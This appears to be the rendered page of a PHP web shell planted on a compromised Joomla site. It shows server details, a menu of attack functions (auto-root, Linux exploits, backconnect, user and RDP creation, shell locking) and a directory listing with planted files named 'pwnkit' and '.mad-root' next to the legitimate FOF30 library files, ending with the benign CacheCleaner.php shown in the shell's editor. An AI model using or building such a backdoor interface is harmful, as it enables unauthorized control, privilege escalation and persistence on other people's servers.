Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
libraries /
fof30 /
Utils /
[ HOME SHELL ]
Name
Size
Permission
Action
FEFHelper
[ DIR ]
drwxr-xr-x
InstallScript
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ArrayHelper.php
12.67
KB
-rw----r--
Buffer.php
6.43
KB
-rw----r--
CacheCleaner.php
2.15
KB
-rw----r--
Collection.php
13.34
KB
-rw----r--
ComponentVersion.php
3.31
KB
-rw----r--
DynamicGroups.php
5.72
KB
-rw----r--
FilesCheck.php
7.2
KB
-rw----r--
InstallScript.php
737
B
-rw----r--
Ip.php
13.94
KB
-rw----r--
ModelTypeHints.php
6.13
KB
-rw----r--
Phpfunc.php
803
B
-rw----r--
SelectOptions.php
10.33
KB
-rw----r--
StringHelper.php
2.05
KB
-rw----r--
TimezoneWrangler.php
9.42
KB
-rw----r--
adminer.php
0
B
-rw-r--r--
helpers.php
9.97
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CacheCleaner.php
<?php /** * @package FOF * @copyright Copyright (c)2010-2019 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU GPL version 2 or later */ namespace FOF30\Utils; defined('_JEXEC') or die; /** * A utility class to help you quickly clean the Joomla! cache */ class CacheCleaner { /** * Clears the com_modules and com_plugins cache. You need to call this whenever you alter the publish state or * parameters of a module or plugin from your code. * * @return void */ public static function clearPluginsAndModulesCache() { self::clearPluginsCache(); self::clearModulesCache(); } /** * Clears the com_plugins cache. You need to call this whenever you alter the publish state or parameters of a * plugin from your code. * * @return void */ public static function clearPluginsCache() { self::clearCacheGroups(array('com_plugins'), array(0,1)); } /** * Clears the com_modules cache. You need to call this whenever you alter the publish state or parameters of a * module from your code. * * @return void */ public static function clearModulesCache() { self::clearCacheGroups(array('com_modules'), array(0,1)); } /** * Clears the specified cache groups. * * @param array $clearGroups Which cache groups to clear. Usually this is com_yourcomponent to clear your * component's cache. * @param array $cacheClients Which cache clients to clear. 0 is the back-end, 1 is the front-end. If you do not * specify anything, both cache clients will be cleared. * * @return void */ public static function clearCacheGroups(array $clearGroups, array $cacheClients = array(0, 1)) { $conf = \JFactory::getConfig(); foreach ($clearGroups as $group) { foreach ($cacheClients as $client_id) { try { $options = array( 'defaultgroup' => $group, 'cachebase' => ($client_id) ? JPATH_ADMINISTRATOR . '/cache' : $conf->get('cache_path', JPATH_SITE . '/cache') ); $cache = \JCache::getInstance('callback', $options); $cache->clean(); } catch (\Exception $e) { // suck it up } } } } }
Close